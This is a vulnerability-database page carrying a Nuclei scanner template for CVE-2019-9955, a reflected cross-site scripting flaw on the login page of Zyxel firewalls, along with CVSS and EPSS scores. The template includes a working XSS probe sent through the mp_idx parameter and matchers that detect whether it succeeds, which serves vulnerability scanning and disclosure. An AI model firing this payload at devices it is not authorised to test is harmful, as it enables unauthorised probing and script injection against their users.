Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2019-9955
HistoryJan 09, 2021 - 2:45 p.m.

Zyxel - Cross-Site Scripting

2021-01-0914:45:11
ProjectDiscovery
github.com
9
zyxel
cross-site scripting
reflected
vulnerability
security
firewall
login page

CVSS2

4.3

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

CVSS3

6.1

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

EPSS

0.029

Percentile

90.9%

Zyxel ATP200, ATP500, ATP800, USG20-VPN, USG20W-VPN, USG40, USG40W, USG60, USG60W, USG110, USG210, USG310, USG1100, USG1900, USG2200-VPN, ZyWALL 110, ZyWALL 310, and ZyWALL 1100 devices contain a reflected cross-site scripting vulnerability on the security firewall login page via the mp_idx parameter.

id: CVE-2019-9955

info:
  name: Zyxel - Cross-Site Scripting
  author: pdteam
  severity: medium
  description: Zyxel ATP200, ATP500, ATP800, USG20-VPN, USG20W-VPN, USG40, USG40W, USG60, USG60W, USG110, USG210, USG310, USG1100, USG1900, USG2200-VPN, ZyWALL 110, ZyWALL 310, and ZyWALL 1100 devices contain a reflected cross-site scripting vulnerability on the security firewall login page via the mp_idx parameter.
  remediation: |
    Apply the latest security patches provided by Zyxel to fix the Cross-Site Scripting vulnerability (CVE-2019-9955).
  reference:
    - http://packetstormsecurity.com/files/152525/Zyxel-ZyWall-Cross-Site-Scripting.html
    - https://www.exploit-db.com/exploits/46706/
    - https://www.securitymetrics.com/blog/Zyxel-Devices-Vulnerable-Cross-Site-Scripting-Login-page
    - https://www.zyxel.com/support/reflected-cross-site-scripting-vulnerability-of-firewalls.shtml
    - https://nvd.nist.gov/vuln/detail/CVE-2019-9955
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2019-9955
    cwe-id: CWE-79
    epss-score: 0.05816
    epss-percentile: 0.93234
    cpe: cpe:2.3:o:zyxel:atp200_firmware:4.31:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: zyxel
    product: atp200_firmware
  tags: cve,cve2019,zyxel,packetstorm,seclists,edb,xss

http:
  - method: GET
    path:
      - "{{BaseURL}}/?mp_idx=%22;alert(%271%27);//"

    matchers:
      - type: word
        part: body
        words:
          - "\";alert('1');//"
          - "<title>Welcome</title>"
        condition: and
# digest: 490a00463044022068f2edaefd78f9fb44f4eb04425f5332e097c63594bf21e5b0cd9e61af644be802202a6b9f5c8d618ef6a5e671559246006b1a14d95404ec973beac57acac576dfb1:922c64590222798bb761d5b6d8e72950

CVSS2

4.3

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

CVSS3

6.1

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

EPSS

0.029

Percentile

90.9%

Related for NUCLEI:CVE-2019-9955